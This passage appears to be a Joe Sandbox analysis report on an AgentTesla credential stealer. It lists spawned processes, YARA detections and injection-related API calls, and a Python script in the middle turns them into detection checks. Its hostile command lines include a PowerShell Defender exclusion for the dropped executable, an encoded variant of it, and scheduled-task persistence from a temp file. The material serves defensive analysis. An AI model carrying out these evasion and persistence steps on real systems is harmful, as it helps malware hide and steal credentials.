                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Target ID:3
                        Start time:07:45:28
                        Start date:21/05/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe"
                        Imagebase:0xcd0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:07:45:28
                        Start date:21/05/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff70f010000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:07:45:28
                        Start date:21/05/2024
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp"
                        Imagebase:0xf40000
                        File size:187'904 bytes
                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:6
                        Start time:07:45:28
                        Start date:21/05/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff70f010000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:07:45:29
                        Start date:21/05/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Imagebase:0x110000
                        File size:45'984 bytes
                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:8
                        Start time:07:45:29
                        Start date:21/05/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Imagebase:0xf80000
                        File size:45'984 bytes
                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1473242520.000000000338C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1473242520.0000000003361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1473242520.0000000003361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        Target ID:9
                        Start time:07:45:30
                        Start date:21/05/2024
                        Path:C:\Users\user\AppData\Roaming\joUXSCpr.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\joUXSCpr.exe
                        Imagebase:0x8a0000
                        File size:751'112 bytes
                        MD5 hash:52CD4C12A51D55526CEAA5F1E7F9E549
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 37%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:10
                        Start time:07:45:30
                        Start date:21/05/2024
                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Imagebase:0x7ff72d8c0000
                        File size:496'640 bytes
                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:11
                        Start time:07:45:32
                        Start date:21/05/2024
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp1263.tmp"
                        Imagebase:0xf40000
                        File size:187'904 bytes
                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:12
                        Start time:07:45:32
                        Start date:21/05/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff70f010000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:13
                        Start time:07:45:32
                        Start date:21/05/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Imagebase:0x200000
                        File size:45'984 bytes
                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:14
                        Start time:07:45:32
                        Start date:21/05/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Imagebase:0x370000
                        File size:45'984 bytes
                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:15
                        Start time:07:45:32
                        Start date:21/05/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Imagebase:0xd90000
                        File size:45'984 bytes
                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2663210822.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2663210822.000000000310F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2663210822.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2663210822.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:false
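The process list above contains three command lines worth turning into host-side checks: powershell.exe adding a Defender exclusion for a file under the user's profile, schtasks.exe creating a task from an XML file in %TEMP%, and RegSvcs.exe launched with no arguments (legitimate use always passes an assembly path; an empty command line is what a loader gives the suspended host it injects into). The dropped copy joUXSCpr.exe also shares its MD5 with the original sample. The script below is an added example, not part of the report: PROCESSES is copied from the Target entries above (id, image, command line, MD5), and ENCODED_SAMPLE is a constructed variant of the exclusion command hidden behind -EncodedCommand, which the check decodes as UTF-16LE base64 before matching.

```python
"""Host-side checks lifted from the process list, run over its command lines.
Added example; PROCESSES is copied from the Target entries (id, image, command line, MD5),
ENCODED_SAMPLE is a constructed -EncodedCommand form of the Defender exclusion."""
import base64
import ntpath
import re

PROCESSES = [
    (1, r"C:\Users\user\Desktop\SMBKT-20242005.exe",
     r'"C:\Users\user\Desktop\SMBKT-20242005.exe"', "52CD4C12A51D55526CEAA5F1E7F9E549"),
    (3, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
     r'-ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe"', "C32CA4ACFCC635EC1EA6ED8A34DF5FAC"),
    (5, r"C:\Windows\SysWOW64\schtasks.exe",
     r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" '
     r'/XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp"', "48C2FE20575769DE916F48EF0676A965"),
    (7, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"', "9D352BC46709F0CB5EC974633A0C3C94"),
    (9, r"C:\Users\user\AppData\Roaming\joUXSCpr.exe",
     r"C:\Users\user\AppData\Roaming\joUXSCpr.exe", "52CD4C12A51D55526CEAA5F1E7F9E549"),
    (11, r"C:\Windows\SysWOW64\schtasks.exe",
     r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" '
     r'/XML "C:\Users\user\AppData\Local\Temp\tmp1263.tmp"', "48C2FE20575769DE916F48EF0676A965"),
    (15, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"', "9D352BC46709F0CB5EC974633A0C3C94"),
]

USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\|\\ProgramData\\|\\Temp\\", re.I)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)
DOTNET_UTILS = {"regsvcs.exe", "regasm.exe", "installutil.exe"}
ENCODED_FLAG = re.compile(r"^-e(c|nc|ncodedcommand)?$", re.I)   # powershell.exe -EncodedCommand and its prefixes


def split_args(cmdline):
    """Windows-style split that keeps quoted paths together and drops the quotes."""
    return [a.strip('"') for a in re.findall(r'"[^"]*"|\S+', cmdline)]


def encode_command(text):
    """What PowerShell expects after -EncodedCommand: base64 of the UTF-16LE script text."""
    return base64.b64encode(text.encode("utf-16-le")).decode()


# Constructed: the exclusion from Target 3 hidden behind -EncodedCommand.
ENCODED_SAMPLE = "powershell.exe -NoP -EncodedCommand " + encode_command(
    r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe"')


def defender_exclusion_for_user_path(cmdline):
    """Add-MpPreference -Exclusion{Path,Process,Extension} naming a user-writable location,
    also when the cmdlet is wrapped in -EncodedCommand."""
    args = split_args(cmdline)
    for i, a in enumerate(args[:-1]):
        if ENCODED_FLAG.match(a):
            try:
                decoded = base64.b64decode(args[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return False
            return defender_exclusion_for_user_path(decoded)
    if not any(a.lower() == "add-mppreference" for a in args):
        return False
    return any(a.lower().startswith("-exclusion") and USER_WRITABLE.search(args[i + 1])
               for i, a in enumerate(args[:-1]))


def scheduled_task_from_temp(cmdline):
    """schtasks /Create taking its task definition from /XML <file in a temp directory>."""
    args = split_args(cmdline)
    if not args or ntpath.basename(args[0]).lower() != "schtasks.exe":
        return False
    low = [a.lower() for a in args]
    if "/create" not in low or "/xml" not in low or low.index("/xml") + 1 >= len(args):
        return False
    return bool(TEMP_DIR.search(args[low.index("/xml") + 1]))


def dotnet_utility_without_arguments(image, cmdline):
    """RegSvcs/RegAsm/InstallUtil take an assembly path when used legitimately; an empty
    argument list is what a loader produces when it spawns its suspended host process."""
    return ntpath.basename(image).lower() in DOTNET_UTILS and len(split_args(cmdline)) == 1


def self_copies(processes):
    """(origin id, dropped id) pairs: same file hash, one started from Desktop/Downloads,
    the other from under AppData."""
    by_hash = {}
    for pid, image, _, md5 in processes:
        by_hash.setdefault(md5.lower(), []).append((pid, image))
    pairs = []
    for group in by_hash.values():
        origins = [p for p, img in group if re.search(r"\\(Desktop|Downloads)\\", img, re.I)]
        dropped = [p for p, img in group if re.search(r"\\AppData\\", img, re.I)]
        pairs.extend((o, d) for o in origins for d in dropped)
    return pairs


def triage(processes):
    """Return (target id, rule) findings in process order, self-copies last."""
    findings = []
    for pid, image, cmdline, _ in processes:
        if defender_exclusion_for_user_path(cmdline):
            findings.append((pid, "defender_exclusion_user_path"))
        if scheduled_task_from_temp(cmdline):
            findings.append((pid, "schtasks_xml_from_temp"))
        if dotnet_utility_without_arguments(image, cmdline):
            findings.append((pid, "dotnet_utility_no_args"))
    for origin, dropped in self_copies(processes):
        findings.append((dropped, f"self_copy_of_target_{origin}"))
    return findings


if __name__ == "__main__":
    for pid, rule in triage(PROCESSES):
        print(f"target {pid:>2}: {rule}")
```

The checks look only at command lines and file hashes because the report lists no parent for each target; in real telemetry the parent image (the Desktop executable spawning powershell.exe, schtasks.exe and RegSvcs.exe in succession) is the obvious extra condition to tighten them.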


                          Execution Graph

                          Execution Coverage:11.2%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:233
                          Total number of Limit Nodes:12
                          execution_graph: node/edge dump of the rendered graph; the interactive view does not survive as text, only the API names on its nodes do. Recoverable from the dump:
                          • a cluster of nodes at 4de091a-4de1f2a that all route through one VirtualProtect wrapper (4de2739/4de2740)
                          • a cluster at 4df5bd3/4df5be0 calling CreateProcessA (4df2da8), VirtualAllocEx (4df2a60), ReadProcessMemory (4df2c10), WriteProcessMemory (4df2b20), Wow64SetThreadContext (4df2550) and ResumeThread (4df24a0): the sequence that starts a child process suspended, writes a payload into it and resumes it, matching the RegSvcs.exe instances above that carry the AgentTesla Yara hits
                          • 137d420: GetCurrentProcess, GetCurrentThread, GetCurrentThreadId; 137d668: DuplicateHandle
                          • 13747f4/1375ca8: CreateActCtxA; 137b3c0: GetModuleHandleW; 137ab90/137b600: LoadLibraryExW
                          • 4df5368/4df71a0: PostMessageW

                          Control-flow Graph
                          • Graph edge list omitted; first basic block 4de2d38-4de2d63; only internal basic blocks and internal calls appear as nodes, no imported API calls
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: /V-+$^f6$Zku$`yT
                          • API String ID: 0-1940165033
                          • Opcode ID: 238a9a519862906d2be2a2904463104bb8f58aebc3575c95fb8d68be3e70179b
                          • Instruction ID: 660e760a08700a1f6d6d57b60b30bf0e9badbcfbb1ee32e79183a9ee7c1bbcf0
                          • Opcode Fuzzy Hash: 238a9a519862906d2be2a2904463104bb8f58aebc3575c95fb8d68be3e70179b
                          • Instruction Fuzzy Hash: 22221774E15219DFDB14DFAAD9847ADBBB2BF89300F10C4AAD809AB354DB349981CF14

                          Control-flow Graph
                          • Graph edge list omitted; first basic block 4de2d29-4de2d63; only internal basic blocks and internal calls appear as nodes, no imported API calls
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: /V-+$^f6$Zku$`yT
                          • API String ID: 0-1940165033
                          • Opcode ID: d5bdc45d43e6b20a3768a170da2bc1713f14fe97697bca783227b5aa3ad63e50
                          • Instruction ID: 2249b860bd6a4660e6058fc3e7c66059fb34d322a24cb736a362ffda937a59f5
                          • Opcode Fuzzy Hash: d5bdc45d43e6b20a3768a170da2bc1713f14fe97697bca783227b5aa3ad63e50
                          • Instruction Fuzzy Hash: 90220774E15219DFDB54DFAAD9847ADBBB2BF88300F10C4AAD809AB354DB349981CF14

                          Control-flow Graph
                          • Graph edge list omitted; first basic block 8e9b840-8e9b865; only internal basic blocks and internal calls appear as nodes, no imported API calls
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: />X$/>X$P,0e
                          • API String ID: 0-1511438267
                          • Opcode ID: d1d8aadd9437742271b2a9757d9275781d7ebd0fd8495ec1875a65318df7e623
                          • Instruction ID: 9f47c126f91ee7e6fd2a4fcc50421c11afa4e384de4d875e786ea7a5d5f85db9
                          • Opcode Fuzzy Hash: d1d8aadd9437742271b2a9757d9275781d7ebd0fd8495ec1875a65318df7e623
                          • Instruction Fuzzy Hash: D1C16771D0021ADFCF18CFA5D4808AEFBB6FF88351F11A529D405AB218DB70AA42CF94

                          Control-flow Graph
                          • Graph edge list omitted; first basic block 8e9b830-8e9b865; only internal basic blocks and internal calls appear as nodes, no imported API calls
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: />X$/>X$P,0e
                          • API String ID: 0-1511438267
                          • Opcode ID: db40dc22d268f021d019d20a1dd075c6cd1cd2c5b4784018607327370009fe3d
                          • Instruction ID: 47a85f3af8c3e912119796117e0f15f4f93f3ed38efdbc01cfaea923b555cb38
                          • Opcode Fuzzy Hash: db40dc22d268f021d019d20a1dd075c6cd1cd2c5b4784018607327370009fe3d
                          • Instruction Fuzzy Hash: 10C19971D0021ADFCB18CFA5D4818AEFBB6FF88351B11A529D445AB214DB74EA42CF94

                          Control-flow Graph
                          • Graph edge list omitted; first basic block 8e9b828-8e9b865; only internal basic blocks and internal calls appear as nodes, no imported API calls
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: />X$/>X$P,0e
                          • API String ID: 0-1511438267
                          • Opcode ID: e548e951d3fc577fdb6c3c84be262e7099ad0cf3281520b195d54d5b86704617
                          • Instruction ID: 57ec5fbbaa67c19b6a80a6126c44149056db8d2eb55c1afbd9c062b5a10428a0
                          • Opcode Fuzzy Hash: e548e951d3fc577fdb6c3c84be262e7099ad0cf3281520b195d54d5b86704617
                          • Instruction Fuzzy Hash: 03C17871D0021ADFCF18CFA5D4818AEFBB6FF88351B11A529D445AB218DB74EA42CF94

                          Control-flow Graph
                          • Graph edge list omitted; first basic block 4de315d-4de316a; only internal basic blocks and internal calls appear as nodes, no imported API calls
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: /V-+$^f6$Zku
                          • API String ID: 0-867436096
                          • Opcode ID: 2b0753d1b3b5573bf885db6f90fb005ce7a4a0ff26ef028f8435f3c68011ad05
                          • Instruction ID: f123b835a453b8b93e90c6d51b3ded1c8b2c70aa2aaf025c9124c718cfbdff54
                          • Opcode Fuzzy Hash: 2b0753d1b3b5573bf885db6f90fb005ce7a4a0ff26ef028f8435f3c68011ad05
                          • Instruction Fuzzy Hash: AAA1F574E00259CFDB64DFA5D954BADBBB2BF88300F1085AAD809AB354DB319E81CF54

                          Control-flow Graph
                          • Graph edge list omitted; first basic block 4de3148-4de316a; only internal basic blocks and internal calls appear as nodes, no imported API calls
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: /V-+$^f6$Zku
                          • API String ID: 0-867436096
                          • Opcode ID: e5d849a5bfe25afa6c515851443488520409b9e85f651882c95dadf6d1dba2be
                          • Instruction ID: 890398c8a72de64d6cca73a6c55631aa1f227294bbaf3649d099d52d337ffd61
                          • Opcode Fuzzy Hash: e5d849a5bfe25afa6c515851443488520409b9e85f651882c95dadf6d1dba2be
                          • Instruction Fuzzy Hash: ADA1F674E00259CFDB64DFA5D954BADBBB2BF88300F1085AAD809AB354DB319E81CF50

                          Control-flow Graph
                          • Graph edge list omitted; first basic block 4de31d0-4de31e5; only internal basic blocks and internal calls appear as nodes, no imported API calls
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: /V-+$^f6$Zku

                          Control-flow Graph

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 0137D49E
                          • GetCurrentThread.KERNEL32 ref: 0137D4DB
                          • GetCurrentProcess.KERNEL32 ref: 0137D518
                          • GetCurrentThreadId.KERNEL32 ref: 0137D571
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

                          Control-flow Graph

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 0137D49E
                          • GetCurrentThread.KERNEL32 ref: 0137D4DB
                          • GetCurrentProcess.KERNEL32 ref: 0137D518
                          • GetCurrentThreadId.KERNEL32 ref: 0137D571
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false

                          Control-flow Graph

                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04DF2FDE
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04DF2FDE
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0137B3DE
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 01375D59
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 01375D59
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04DF2BB0
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04DF2BB0
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04DF2C90
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04DF25CE
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0137D6EF
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04DF25CE
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04DF2C90
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0137D6EF
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04DE27B3
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: bab2b77d29277bb44c63d68e67ccb6bbb0b6ab50964f48b545cdaf1e4547ff68
                          • Instruction ID: 6fa1ab7c03f0b26e6764839dced485dd2fcf2d2a29cce7b1ffdfe099a3650e63
                          • Opcode Fuzzy Hash: bab2b77d29277bb44c63d68e67ccb6bbb0b6ab50964f48b545cdaf1e4547ff68
                          • Instruction Fuzzy Hash: 5921E5759042499FDB10DFAAC484BDEBFF4EF49320F14806AE958A7251D374A944CFA1
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04DE27B3
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: dbe4b45014544537ef6fea56bb8f0a0ec05775522c391e5d251d6a735ac02cbe
                          • Instruction ID: 645fda646b0fe1a56a56e0760bd8b7728475159851693d8729fc98faa3b1a5cb
                          • Opcode Fuzzy Hash: dbe4b45014544537ef6fea56bb8f0a0ec05775522c391e5d251d6a735ac02cbe
                          • Instruction Fuzzy Hash: B721D6759002499FDB10DF9AC485BDEFBF4FB48310F108429E958A7250D778A944CFA1
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0137B459,00000800,00000000,00000000), ref: 0137B66A
                          Memory Dump Source
